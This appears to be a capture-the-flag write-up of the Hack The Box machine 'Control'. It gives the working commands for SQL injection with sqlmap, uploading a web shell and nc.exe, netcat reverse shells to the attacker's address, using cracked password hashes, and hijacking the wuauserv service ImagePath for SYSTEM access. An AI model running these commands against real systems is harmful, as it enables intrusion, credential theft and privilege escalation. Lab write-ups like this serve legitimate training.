Control,a Windows box created by HacktheBox user TRX, was an overall hard difficulty box. The initial foothold was about finding the sql injection on the
view_product page. Using that we can upload
nc.exe and get a low privilege shell.Also, we get few hashes and checking them on crackstation we can get password for two of them . Using that we can get another shell as user. Privilege Escalation was little pain as we cannot use any Enumeration scripts looking around we find some commands in powershell history.We see we have Full Control on services, Then it was all about finding the correct service which we can exploit to get Administrator.
Lets Start with nmap scan.
# Nmap 7.80 scan initiated Fri Dec 6 11:04:46 2019 as: nmap -sC -sV -oN nmap/control 10.10.10.167
Open ports: 80 (http), 135(msrpc) and 3306(mysql).
Checking the web page we find a comment saying we need to pass a Proxy Header to get access to Admin page.
I check the function.js where i see there are few more pages like
view_product.php, update,delete and create product.
I saw that the js was posting
productId to the
view_product checking that for sql-injection with
sqlmap. we see that it is vulnerable
The most interesting part of the information are the hashes:
cracking those hashes we get password for
We can also upload
--file-write feature. I upload a web shell and
sqlmap -r ./loot/web/viewproduct.req --dbms=mysql --file-write=./payloads/shell.php --file-dest=/inetpub/wwwroot/f3v3r.php
sqlmap -r ./loot/web/viewproduct.req --dbms=mysql --file-write=./payloads/nc64.exe --file-dest=/inetpub/wwwroot/nc.exe
and using the web shell we can get a reverse shell.
nc.exe 10.10.X.X 1234 -e powershell.exe
We have potential creds for
hector. I remember
Arkham box from HTB. let’s try that to upgrade and get another shell as user.
so i tried.
$username = "Fidelity\hector"
and get a shell
New-PSSession -Credential $cred | Enter-PSSession
Using the new session we can get a proper shell.
c:\inetpub\wwwroot\nc.exe 10.10.X.X 9001 -e powershell.exe
and we get user for the box.
and we get user for Control.
The only hint you can find about how to become administrator is inside the PS history (looks like we need to pay special attention to ACLs, and the services configurations are inside that registry):
Becoming administrator is really easy, but because of the restriction of using several Win PE enumeration tools you have to discover the way by yourself (which makes this more difficult).
Finally, you can find that Hector had FullControl in several services. You can discover this by running this ugly PS-cmd script:
get-acl HKLM:\System\CurrentControlSet\services\* | Format-List *| findstr /i "Hector Users Path"
wuauserv service to get root. by modifying the image-path with nc.exe to get reverse shell, and running the service.
reg add"HKLM\System\CurrentControlSet\services\wuauserv" /t REG_EXPAND_SZ/v ImagePath /d "C:\windows\system32\spool\drivers\color\nc.exe10.10.14.21 1337 -e cmd" /f
Using that we get the root shell
and we have pwned